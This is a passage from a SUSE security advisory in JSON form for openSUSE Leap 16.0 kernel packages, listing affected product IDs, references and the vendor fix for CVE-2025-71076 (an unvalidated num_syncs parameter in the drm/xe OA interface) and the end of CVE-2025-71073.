"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71073"
},
{
"cve": "CVE-2025-71076",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71076"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/oa: Limit num_syncs to prevent oversized allocations\n\nThe OA open parameters did not validate num_syncs, allowing\nuserspace to pass arbitrarily large values, potentially\nleading to excessive allocations.\n\nAdd check to ensure that num_syncs does not exceed DRM_XE_MAX_SYNCS,\nreturning -EINVAL when the limit is violated.\n\nv2: use XE_IOCTL_DBG() and drop duplicated check. (Ashutosh)\n\n(cherry picked from commit e057b2d2b8d815df3858a87dffafa2af37e5945b)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71076",
"url": "https://www.suse.com/security/cve/CVE-2025-71076"
},
{
"category": "external",
"summary": "SUSE Bug 1256627 for CVE-2025-71076",
"url": "https://bugzilla.suse.com/1256627"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
